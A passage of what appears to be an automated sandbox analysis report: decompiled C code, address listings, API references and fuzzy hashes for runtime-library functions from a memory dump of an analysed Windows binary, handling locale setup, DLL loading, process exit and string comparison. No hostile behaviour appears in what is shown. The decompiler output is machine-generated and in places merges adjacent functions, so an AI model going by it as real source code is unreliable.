                                                                                      				signed int _t102;
                                                                                      				void* _t104;
                                                                                      				void* _t107;
                                                                                      				void* _t110;
                                                                                      
                                                                                      				_t86 = __edx;
                                                                                      				_t100 = _t102;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x4320f0);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t42 =  *0x443048; // 0x9900ec21
                                                                                      				_t43 = _t42 ^ _t102;
                                                                                      				_v20 = _t43;
                                                                                      				_push(__ebx);
                                                                                      				_push(__esi);
                                                                                      				_push(_t87);
                                                                                      				_push(_t43);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t45 = __ecx;
                                                                                      				_v44 = __ecx;
                                                                                      				_v28 = __ecx;
                                                                                      				_t5 = _t45 + 8; // 0x8
                                                                                      				_t69 = _t5;
                                                                                      				_v48 = __ecx;
                                                                                      				_v36 = _t69;
                                                                                      				_push(1);
                                                                                      				_v8 = 0;
                                                                                      				_t46 = E00412660(_t69, _t87, __esi, __eflags);
                                                                                      				_t104 = _t102 - 0x20 + 4;
                                                                                      				 *(_t69 + 4) = _t46;
                                                                                      				_v8 = 1;
                                                                                      				E0041247D( &_v28, 0);
                                                                                      				_v8 = 2;
                                                                                      				_t48 =  *0x444f58; // 0x0
                                                                                      				_t88 =  *0x444fd4; // 0x0
                                                                                      				_v24 = _t48;
                                                                                      				_v40 = _t48;
                                                                                      				if(_t88 == 0) {
                                                                                      					E0041247D( &_v32, _t88);
                                                                                      					_t110 =  *0x444fd4 - _t88; // 0x0
                                                                                      					if(_t110 == 0) {
                                                                                      						_t66 =  *0x444310; // 0x2
                                                                                      						_t67 = _t66 + 1;
                                                                                      						 *0x444310 = _t67;
                                                                                      						 *0x444fd4 = _t67;
                                                                                      					}
                                                                                      					E004124D5( &_v32);
                                                                                      					_t88 =  *0x444fd4; // 0x0
                                                                                      				}
                                                                                      				_t75 =  *(_t69 + 4);
                                                                                      				_t70 = _t88 * 4;
                                                                                      				if(_t88 >= _t75[3]) {
                                                                                      					_t95 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L9;
                                                                                      				} else {
                                                                                      					_t95 =  *(_t70 + _t75[2]);
                                                                                      					if(_t95 == 0) {
                                                                                      						L9:
                                                                                      						__eflags = _t75[5];
                                                                                      						if(_t75[5] == 0) {
                                                                                      							L12:
                                                                                      							__eflags = _t95;
                                                                                      							if(_t95 != 0) {
                                                                                      								goto L6;
                                                                                      							} else {
                                                                                      								goto L13;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t61 = E0041265A();
                                                                                      							__eflags = _t88 -  *((intOrPtr*)(_t61 + 0xc));
                                                                                      							if(_t88 >=  *((intOrPtr*)(_t61 + 0xc))) {
                                                                                      								L13:
                                                                                      								_t95 = _v24;
                                                                                      								_t71 = _v36;
                                                                                      								__eflags = _t95;
                                                                                      								if(_t95 != 0) {
                                                                                      									goto L7;
                                                                                      								} else {
                                                                                      									_push(_t71);
                                                                                      									_t54 = E0040BBE0(_t71, _t86, _t88,  &_v40);
                                                                                      									_t107 = _t104 + 8;
                                                                                      									__eflags = _t54 - 0xffffffff;
                                                                                      									if(__eflags == 0) {
                                                                                      										_t55 = E00403390();
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_push(_t88);
                                                                                      										_t91 = _t75;
                                                                                      										__eflags =  *_t91;
                                                                                      										if( *_t91 == 0) {
                                                                                      											L23:
                                                                                      											 *_t91 = 0;
                                                                                      											return _t55;
                                                                                      										} else {
                                                                                      											_t55 = _t55 | 0xffffffff;
                                                                                      											__eflags = _t55;
                                                                                      											asm("lock xadd [ecx+0x20], eax");
                                                                                      											if(_t55 != 0) {
                                                                                      												goto L23;
                                                                                      											} else {
                                                                                      												_push(_t95);
                                                                                      												_t97 =  *_t91;
                                                                                      												__eflags = _t97;
                                                                                      												if(_t97 != 0) {
                                                                                      													asm("o16 nop [eax+eax]");
                                                                                      													do {
                                                                                      														_t82 = _t97;
                                                                                      														_t56 = _t97 + 0xc;
                                                                                      														_t97 =  *_t56;
                                                                                      														 *_t56 = 0;
                                                                                      														_t55 =  *((intOrPtr*)( *_t82))(1);
                                                                                      														__eflags = _t97;
                                                                                      													} while (_t97 != 0);
                                                                                      												}
                                                                                      												 *_t91 = 0;
                                                                                      												return _t55;
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										_t95 = _v40;
                                                                                      										_v24 = _t95;
                                                                                      										_v8 = 3;
                                                                                      										E0041262E(__eflags, _t95);
                                                                                      										_t104 = _t107 + 4;
                                                                                      										 *((intOrPtr*)( *_t95 + 4))();
                                                                                      										 *0x444f58 = _t95;
                                                                                      										goto L7;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t95 =  *(_t70 +  *((intOrPtr*)(_t61 + 8)));
                                                                                      								goto L12;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						L6:
                                                                                      						_t71 = _v36;
                                                                                      						L7:
                                                                                      						_v8 = 1;
                                                                                      						E004124D5( &_v28);
                                                                                      						_t89 = _v44;
                                                                                      						 *_t89 = _t95;
                                                                                      						_t89[1] = E00408230(_t71, _t71);
                                                                                      						 *[fs:0x0] = _v16;
                                                                                      						_pop(_t90);
                                                                                      						_pop(_t96);
                                                                                      						_pop(_t72);
                                                                                      						return E0041361E(_t89, _t72, _v20 ^ _t100, _t86, _t90, _t96);
                                                                                      					}
                                                                                      				}
                                                                                      			}











































                                                                                      0x0040b260
                                                                                      0x0040b261
                                                                                      0x0040b263
                                                                                      0x0040b265
                                                                                      0x0040b270
                                                                                      0x0040b274
                                                                                      0x0040b279
                                                                                      0x0040b27b
                                                                                      0x0040b27e
                                                                                      0x0040b27f
                                                                                      0x0040b280
                                                                                      0x0040b281
                                                                                      0x0040b285
                                                                                      0x0040b28b
                                                                                      0x0040b28d
                                                                                      0x0040b290
                                                                                      0x0040b293
                                                                                      0x0040b293
                                                                                      0x0040b296
                                                                                      0x0040b299
                                                                                      0x0040b29c
                                                                                      0x0040b29e
                                                                                      0x0040b2a5
                                                                                      0x0040b2aa
                                                                                      0x0040b2ad
                                                                                      0x0040b2b5
                                                                                      0x0040b2bc
                                                                                      0x0040b2c1
                                                                                      0x0040b2c5
                                                                                      0x0040b2ca
                                                                                      0x0040b2d0
                                                                                      0x0040b2d3
                                                                                      0x0040b2d8
                                                                                      0x0040b2de
                                                                                      0x0040b2e3
                                                                                      0x0040b2e9
                                                                                      0x0040b2eb
                                                                                      0x0040b2f0
                                                                                      0x0040b2f1
                                                                                      0x0040b2f6
                                                                                      0x0040b2f6
                                                                                      0x0040b2fe
                                                                                      0x0040b303
                                                                                      0x0040b303
                                                                                      0x0040b309
                                                                                      0x0040b30c
                                                                                      0x0040b316
                                                                                      0x0040b360
                                                                                      0x0040b360
                                                                                      0x00000000
                                                                                      0x0040b318
                                                                                      0x0040b31b
                                                                                      0x0040b320
                                                                                      0x0040b362
                                                                                      0x0040b362
                                                                                      0x0040b366
                                                                                      0x0040b378
                                                                                      0x0040b378
                                                                                      0x0040b37a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040b368
                                                                                      0x0040b368
                                                                                      0x0040b36d
                                                                                      0x0040b370
                                                                                      0x0040b37c
                                                                                      0x0040b37c
                                                                                      0x0040b37f
                                                                                      0x0040b382
                                                                                      0x0040b384
                                                                                      0x00000000
                                                                                      0x0040b386
                                                                                      0x0040b389
                                                                                      0x0040b38b
                                                                                      0x0040b390
                                                                                      0x0040b393
                                                                                      0x0040b396
                                                                                      0x0040b3bd
                                                                                      0x0040b3c2
                                                                                      0x0040b3c3
                                                                                      0x0040b3c4
                                                                                      0x0040b3c5
                                                                                      0x0040b3c6
                                                                                      0x0040b3c7
                                                                                      0x0040b3c8
                                                                                      0x0040b3c9
                                                                                      0x0040b3ca
                                                                                      0x0040b3cb
                                                                                      0x0040b3cc
                                                                                      0x0040b3cd
                                                                                      0x0040b3ce
                                                                                      0x0040b3cf
                                                                                      0x0040b3d0
                                                                                      0x0040b3d1
                                                                                      0x0040b3d5
                                                                                      0x0040b3d7
                                                                                      0x0040b410
                                                                                      0x0040b410
                                                                                      0x0040b417
                                                                                      0x0040b3d9
                                                                                      0x0040b3d9
                                                                                      0x0040b3d9
                                                                                      0x0040b3dc
                                                                                      0x0040b3e1
                                                                                      0x00000000
                                                                                      0x0040b3e3
                                                                                      0x0040b3e3
                                                                                      0x0040b3e4
                                                                                      0x0040b3e6
                                                                                      0x0040b3e8
                                                                                      0x0040b3ea
                                                                                      0x0040b3f0
                                                                                      0x0040b3f0
                                                                                      0x0040b3f2
                                                                                      0x0040b3f5
                                                                                      0x0040b3f7
                                                                                      0x0040b401
                                                                                      0x0040b403
                                                                                      0x0040b403
                                                                                      0x0040b3f0
                                                                                      0x0040b408
                                                                                      0x0040b40f
                                                                                      0x0040b40f
                                                                                      0x0040b3e1
                                                                                      0x0040b398
                                                                                      0x0040b398
                                                                                      0x0040b39b
                                                                                      0x0040b39f
                                                                                      0x0040b3a3
                                                                                      0x0040b3aa
                                                                                      0x0040b3af
                                                                                      0x0040b3b2
                                                                                      0x00000000
                                                                                      0x0040b3b2
                                                                                      0x0040b396
                                                                                      0x0040b372
                                                                                      0x0040b375
                                                                                      0x00000000
                                                                                      0x0040b375
                                                                                      0x0040b370
                                                                                      0x0040b322
                                                                                      0x0040b322
                                                                                      0x0040b322
                                                                                      0x0040b325
                                                                                      0x0040b328
                                                                                      0x0040b32c
                                                                                      0x0040b331
                                                                                      0x0040b335
                                                                                      0x0040b33c
                                                                                      0x0040b347
                                                                                      0x0040b34f
                                                                                      0x0040b350
                                                                                      0x0040b351
                                                                                      0x0040b35f
                                                                                      0x0040b35f
                                                                                      0x0040b320

                                                                                      APIs
                                                                                      • std::locale::_Init.LIBCPMT ref: 0040B2A5
                                                                                        • Part of subcall function 00412660: __EH_prolog3.LIBCMT ref: 00412667
                                                                                        • Part of subcall function 00412660: std::_Lockit::_Lockit.LIBCPMT ref: 00412672
                                                                                        • Part of subcall function 00412660: std::locale::_Setgloballocale.LIBCPMT ref: 0041268D
                                                                                        • Part of subcall function 00412660: _Yarn.LIBCPMT ref: 004126A3
                                                                                        • Part of subcall function 00412660: std::_Lockit::~_Lockit.LIBCPMT ref: 004126E3
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040B2BC
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040B2DE
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040B2FE
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040B32C
                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040B3A3
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040B3BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Concurrency::cancel_current_taskFacet_H_prolog3InitRegisterSetgloballocaleYarn
                                                                                      • String ID:
                                                                                      • API String ID: 298508500-0
                                                                                      • Opcode ID: 527c6553f3427f70bc44a63b46d87f176bd0c39fffb288d215c6c4de015fcb83
                                                                                      • Instruction ID: ff1659b67b507256d8fb927cf8064d15eabcb5019be6195162a6b86e99dc18e4
                                                                                      • Opcode Fuzzy Hash: 527c6553f3427f70bc44a63b46d87f176bd0c39fffb288d215c6c4de015fcb83
                                                                                      • Instruction Fuzzy Hash: 5A418075D00208DFCB11CF98D941BAEB7B0FB48714F24416AD815B7381D778AE44CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004230D4(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                                                      				signed int _v8;
                                                                                      				void* _t20;
                                                                                      				void* _t22;
                                                                                      				WCHAR* _t26;
                                                                                      				signed int _t29;
                                                                                      				void** _t30;
                                                                                      				signed int* _t35;
                                                                                      				void* _t38;
                                                                                      				void* _t40;
                                                                                      
                                                                                      				_t35 = _a4;
                                                                                      				while(_t35 != _a8) {
                                                                                      					_t29 =  *_t35;
                                                                                      					_v8 = _t29;
                                                                                      					_t38 =  *(0x444d48 + _t29 * 4);
                                                                                      					if(_t38 == 0) {
                                                                                      						_t26 =  *(0x436e10 + _t29 * 4);
                                                                                      						_t38 = LoadLibraryExW(_t26, 0, 0x800);
                                                                                      						if(_t38 != 0) {
                                                                                      							L14:
                                                                                      							_t30 = 0x444d48 + _v8 * 4;
                                                                                      							 *_t30 = _t38;
                                                                                      							if( *_t30 != 0) {
                                                                                      								FreeLibrary(_t38);
                                                                                      							}
                                                                                      							L16:
                                                                                      							_t20 = _t38;
                                                                                      							L13:
                                                                                      							return _t20;
                                                                                      						}
                                                                                      						_t22 = GetLastError();
                                                                                      						if(_t22 != 0x57) {
                                                                                      							L9:
                                                                                      							 *(0x444d48 + _v8 * 4) = _t22 | 0xffffffff;
                                                                                      							L10:
                                                                                      							_t35 =  &(_t35[1]);
                                                                                      							continue;
                                                                                      						}
                                                                                      						_t22 = E00420218(_t26, L"api-ms-", 7);
                                                                                      						_t40 = _t40 + 0xc;
                                                                                      						if(_t22 == 0) {
                                                                                      							goto L9;
                                                                                      						}
                                                                                      						_t22 = E00420218(_t26, L"ext-ms-", 7);
                                                                                      						_t40 = _t40 + 0xc;
                                                                                      						if(_t22 == 0) {
                                                                                      							goto L9;
                                                                                      						}
                                                                                      						_t22 = LoadLibraryExW(_t26, _t38, _t38);
                                                                                      						_t38 = _t22;
                                                                                      						if(_t38 != 0) {
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						goto L9;
                                                                                      					}
                                                                                      					if(_t38 != 0xffffffff) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				_t20 = 0;
                                                                                      				goto L13;
                                                                                      			}












                                                                                      0x004230dd
                                                                                      0x00423172
                                                                                      0x004230e5
                                                                                      0x004230e7
                                                                                      0x004230f1
                                                                                      0x004230f6
                                                                                      0x00423103
                                                                                      0x00423118
                                                                                      0x0042311c
                                                                                      0x00423182
                                                                                      0x00423187
                                                                                      0x0042318e
                                                                                      0x00423192
                                                                                      0x00423195
                                                                                      0x00423195
                                                                                      0x0042319b
                                                                                      0x0042319b
                                                                                      0x0042317d
                                                                                      0x00423181
                                                                                      0x00423181
                                                                                      0x0042311e
                                                                                      0x00423127
                                                                                      0x00423160
                                                                                      0x0042316d
                                                                                      0x0042316f
                                                                                      0x0042316f
                                                                                      0x00000000
                                                                                      0x0042316f
                                                                                      0x00423131
                                                                                      0x00423136
                                                                                      0x0042313b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423145
                                                                                      0x0042314a
                                                                                      0x0042314f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423154
                                                                                      0x0042315a
                                                                                      0x0042315e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042315e
                                                                                      0x004230fb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00423101
                                                                                      0x0042317b
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,004231E1,00402EC7,?,?,00000000,?,?,0042340B,00000021,FlsSetValue,00437430,00437438,?), ref: 00423195
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: f0df5e45352c92f9d67394726655a06941e75b4868e660512e8b928e2338077a
                                                                                      • Instruction ID: 82b5b76a2cbfa9af0ecd2bd83a300dfd513fac302c34fec3c259524cb878e5d2
                                                                                      • Opcode Fuzzy Hash: f0df5e45352c92f9d67394726655a06941e75b4868e660512e8b928e2338077a
                                                                                      • Instruction Fuzzy Hash: EF212075B00221BBCB219F64AC81A6B33789B417A2F250122F805A7290D73CEF11CAEC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 25%
                                                                                      			E0041E1D3(intOrPtr _a4) {
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _t11;
                                                                                      				int _t14;
                                                                                      				void* _t16;
                                                                                      				void* _t20;
                                                                                      				int _t22;
                                                                                      				signed int _t23;
                                                                                      
                                                                                      				_t11 =  *0x443048; // 0x9900ec21
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                      				_t14 =  &_v20;
                                                                                      				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x4318a0, 0xffffffff);
                                                                                      				if(_t14 != 0) {
                                                                                      					_t14 = GetProcAddress(_v20, "CorExitProcess");
                                                                                      					_t22 = _t14;
                                                                                      					if(_t22 != 0) {
                                                                                      						 *0x4331a4(_a4);
                                                                                      						_t14 =  *_t22();
                                                                                      					}
                                                                                      				}
                                                                                      				if(_v20 != 0) {
                                                                                      					_t14 = FreeLibrary(_v20);
                                                                                      				}
                                                                                      				 *[fs:0x0] = _v16;
                                                                                      				return _t14;
                                                                                      			}











                                                                                      0x0041e1e8
                                                                                      0x0041e1f3
                                                                                      0x0041e1f9
                                                                                      0x0041e1fd
                                                                                      0x0041e208
                                                                                      0x0041e210
                                                                                      0x0041e21a
                                                                                      0x0041e220
                                                                                      0x0041e224
                                                                                      0x0041e22b
                                                                                      0x0041e231
                                                                                      0x0041e231
                                                                                      0x0041e224
                                                                                      0x0041e237
                                                                                      0x0041e23c
                                                                                      0x0041e23c
                                                                                      0x0041e245
                                                                                      0x0041e24f

                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9900EC21,?,?,00000000,004318A0,000000FF,?,0041E163,?,?,0041E137,00000016), ref: 0041E208
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041E21A
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,004318A0,000000FF,?,0041E163,?,?,0041E137,00000016), ref: 0041E23C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: 0'@$CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-3869136949
                                                                                      • Opcode ID: a35666b667b6824be0dd86e1a805249ec7202434fa09b65fc768ad604416d36e
                                                                                      • Instruction ID: 3fb230787f26049f8eb3d17a73e89fb851ca5ebcfd2b5036e103cdca32cf97e4
                                                                                      • Opcode Fuzzy Hash: a35666b667b6824be0dd86e1a805249ec7202434fa09b65fc768ad604416d36e
                                                                                      • Instruction Fuzzy Hash: D601A775904515BFDB158F51DC06BAEBBB8FB08B11F004526F811A2390DB789A40CA58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E00413167(intOrPtr _a4, intOrPtr _a8, short* _a12, short* _a16, char* _a20, int _a24, int _a28) {
                                                                                      				signed int _v8;
                                                                                      				char _v22;
                                                                                      				struct _cpinfo _v28;
                                                                                      				int _v32;
                                                                                      				char* _v36;
                                                                                      				short* _v40;
                                                                                      				int _v44;
                                                                                      				short* _v48;
                                                                                      				short* _v52;
                                                                                      				intOrPtr _v56;
                                                                                      				void* _v68;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t54;
                                                                                      				short* _t58;
                                                                                      				signed int _t63;
                                                                                      				signed int _t64;
                                                                                      				short* _t66;
                                                                                      				signed int _t68;
                                                                                      				signed int _t69;
                                                                                      				short* _t72;
                                                                                      				char* _t75;
                                                                                      				char* _t76;
                                                                                      				int _t79;
                                                                                      				intOrPtr _t88;
                                                                                      				intOrPtr _t89;
                                                                                      				short* _t96;
                                                                                      				signed int _t97;
                                                                                      				short* _t98;
                                                                                      
                                                                                      				_t54 =  *0x443048; // 0x9900ec21
                                                                                      				_v8 = _t54 ^ _t97;
                                                                                      				_t96 = _a12;
                                                                                      				_t95 = _a16;
                                                                                      				_v56 = _a4;
                                                                                      				_t57 = _a20;
                                                                                      				_v32 = _t96;
                                                                                      				_v36 = _a20;
                                                                                      				if(_t95 <= 0) {
                                                                                      					if(_t95 < 0xffffffff) {
                                                                                      						goto L56;
                                                                                      					}
                                                                                      					goto L3;
                                                                                      				} else {
                                                                                      					_t95 = E0041D20D(_t96, _t95);
                                                                                      					_t57 = _v36;
                                                                                      					L3:
                                                                                      					_t79 = _a24;
                                                                                      					if(_t79 <= 0) {
                                                                                      						if(_t79 < 0xffffffff) {
                                                                                      							L56:
                                                                                      							_t58 = 0;
                                                                                      							L57:
                                                                                      							return E0041361E(_t58, _t79, _v8 ^ _t97, _t94, _t95, _t96);
                                                                                      						}
                                                                                      						L6:
                                                                                      						if(_t95 == 0 || _t79 == 0) {
                                                                                      							if(_t95 == _t79) {
                                                                                      								L55:
                                                                                      								_push(2);
                                                                                      								L20:
                                                                                      								_pop(_t58);
                                                                                      								goto L57;
                                                                                      							}
                                                                                      							if(_t79 > 1) {
                                                                                      								L29:
                                                                                      								_t58 = 1;
                                                                                      								goto L57;
                                                                                      							}
                                                                                      							if(_t95 > 1) {
                                                                                      								L19:
                                                                                      								_push(3);
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							if(GetCPInfo(_a28,  &_v28) == 0) {
                                                                                      								goto L56;
                                                                                      							}
                                                                                      							if(_t95 <= 0) {
                                                                                      								if(_t79 <= 0) {
                                                                                      									goto L30;
                                                                                      								}
                                                                                      								if(_v28 < 2) {
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								_t75 =  &_v22;
                                                                                      								if(_v22 == 0) {
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								_t95 = _v36;
                                                                                      								while(1) {
                                                                                      									_t88 =  *((intOrPtr*)(_t75 + 1));
                                                                                      									if(_t88 == 0) {
                                                                                      										goto L29;
                                                                                      									}
                                                                                      									_t94 =  *_t95;
                                                                                      									if(_t94 <  *_t75 || _t94 > _t88) {
                                                                                      										_t75 = _t75 + 2;
                                                                                      										if( *_t75 != 0) {
                                                                                      											continue;
                                                                                      										}
                                                                                      										goto L29;
                                                                                      									} else {
                                                                                      										goto L55;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L29;
                                                                                      							}
                                                                                      							if(_v28 < 2) {
                                                                                      								goto L19;
                                                                                      							}
                                                                                      							_t76 =  &_v22;
                                                                                      							if(_v22 == 0) {
                                                                                      								goto L19;
                                                                                      							} else {
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							while(1) {
                                                                                      								L15:
                                                                                      								_t89 =  *((intOrPtr*)(_t76 + 1));
                                                                                      								if(_t89 == 0) {
                                                                                      									goto L19;
                                                                                      								}
                                                                                      								_t94 =  *_t96;
                                                                                      								if(_t94 <  *_t76 || _t94 > _t89) {
                                                                                      									_t76 = _t76 + 2;
                                                                                      									if( *_t76 != 0) {
                                                                                      										continue;
                                                                                      									}
                                                                                      									goto L19;
                                                                                      								} else {
                                                                                      									goto L55;
                                                                                      								}
                                                                                      							}
                                                                                      							goto L19;
                                                                                      						} else {
                                                                                      							L30:
                                                                                      							_t96 = 0;
                                                                                      							_t63 = MultiByteToWideChar(_a28, 9, _v32, _t95, 0, 0);
                                                                                      							_v44 = _t63;
                                                                                      							if(_t63 == 0) {
                                                                                      								goto L56;
                                                                                      							}
                                                                                      							_t94 = _t63 + _t63 + 8;
                                                                                      							asm("sbb eax, eax");
                                                                                      							_t64 = _t63 & _t63 + _t63 + 0x00000008;
                                                                                      							if(_t64 == 0) {
                                                                                      								_v52 = 0;
                                                                                      								L54:
                                                                                      								E00412F64( &_v52);
                                                                                      								_t58 = _t96;
                                                                                      								goto L57;
                                                                                      							}
                                                                                      							if(_t64 > 0x400) {
                                                                                      								_push(_t64);
                                                                                      								_t66 = E0041BF16();
                                                                                      								_v40 = _t66;
                                                                                      								if(_t66 == 0) {
                                                                                      									L38:
                                                                                      									_v52 = _t66;
                                                                                      									if(_t66 == 0 || MultiByteToWideChar(_a28, 1, _v32, _t95, _t66, _v44) == 0) {
                                                                                      										goto L54;
                                                                                      									} else {
                                                                                      										_t95 = _v36;
                                                                                      										_t68 = MultiByteToWideChar(_a28, 9, _v36, _t79, _t96, _t96);
                                                                                      										_v32 = _t68;
                                                                                      										if(_t68 == 0) {
                                                                                      											goto L54;
                                                                                      										}
                                                                                      										_t94 = _t68 + _t68 + 8;
                                                                                      										asm("sbb eax, eax");
                                                                                      										_t69 = _t68 & _t68 + _t68 + 0x00000008;
                                                                                      										if(_t69 == 0) {
                                                                                      											_v48 = _t96;
                                                                                      											L52:
                                                                                      											E00412F64( &_v48);
                                                                                      											goto L54;
                                                                                      										}
                                                                                      										if(_t69 > 0x400) {
                                                                                      											_push(_t69);
                                                                                      											_t95 = E0041BF16();
                                                                                      											if(_t95 == 0) {
                                                                                      												L48:
                                                                                      												_v48 = _t95;
                                                                                      												if(_t95 != 0) {
                                                                                      													_t72 = MultiByteToWideChar(_a28, 1, _v36, _t79, _t95, _v32);
                                                                                      													if(_t72 != 0) {
                                                                                      														__imp__CompareStringEx(_v56, _a8, _v40, _v44, _t95, _v32, _t96, _t96, _t96);
                                                                                      														_t96 = _t72;
                                                                                      													}
                                                                                      												}
                                                                                      												goto L52;
                                                                                      											}
                                                                                      											 *_t95 = 0xdddd;
                                                                                      											L47:
                                                                                      											_t95 =  &(_t95[4]);
                                                                                      											goto L48;
                                                                                      										}
                                                                                      										E00413C50(_t69);
                                                                                      										_t95 = _t98;
                                                                                      										if(_t95 == 0) {
                                                                                      											goto L48;
                                                                                      										}
                                                                                      										 *_t95 = 0xcccc;
                                                                                      										goto L47;
                                                                                      									}
                                                                                      								}
                                                                                      								 *_t66 = 0xdddd;
                                                                                      								L37:
                                                                                      								_t66 =  &(_t66[4]);
                                                                                      								_v40 = _t66;
                                                                                      								goto L38;
                                                                                      							}
                                                                                      							E00413C50(_t64);
                                                                                      							_t66 = _t98;
                                                                                      							_v40 = _t66;
                                                                                      							if(_t66 == 0) {
                                                                                      								goto L38;
                                                                                      							}
                                                                                      							 *_t66 = 0xcccc;
                                                                                      							goto L37;
                                                                                      						}
                                                                                      					}
                                                                                      					_t79 = E0041D20D(_t57, _t79);
                                                                                      					goto L6;
                                                                                      				}
                                                                                      			}

































                                                                                      0x0041316d
                                                                                      0x00413174
                                                                                      0x0041317c
                                                                                      0x00413180
                                                                                      0x00413183
                                                                                      0x00413186
                                                                                      0x00413189
                                                                                      0x0041318c
                                                                                      0x00413191
                                                                                      0x004131a6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413193
                                                                                      0x0041319b
                                                                                      0x0041319d
                                                                                      0x004131ac
                                                                                      0x004131ac
                                                                                      0x004131b1
                                                                                      0x004131c3
                                                                                      0x004133b9
                                                                                      0x004133b9
                                                                                      0x004133bb
                                                                                      0x004133cc
                                                                                      0x004133cc
                                                                                      0x004131c9
                                                                                      0x004131cb
                                                                                      0x004131d7
                                                                                      0x004133b2
                                                                                      0x004133b2
                                                                                      0x00413232
                                                                                      0x00413232
                                                                                      0x00000000
                                                                                      0x00413232
                                                                                      0x004131e0
                                                                                      0x0041326b
                                                                                      0x0041326d
                                                                                      0x00000000
                                                                                      0x0041326d
                                                                                      0x004131e9
                                                                                      0x00413230
                                                                                      0x00413230
                                                                                      0x00000000
                                                                                      0x00413230
                                                                                      0x004131fa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413202
                                                                                      0x0041323a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413240
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413246
                                                                                      0x00413249
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041324b
                                                                                      0x0041324e
                                                                                      0x0041324e
                                                                                      0x00413253
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413255
                                                                                      0x00413259
                                                                                      0x00413263
                                                                                      0x00413269
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413259
                                                                                      0x00000000
                                                                                      0x0041324e
                                                                                      0x00413208
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041320e
                                                                                      0x00413211
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413213
                                                                                      0x00413213
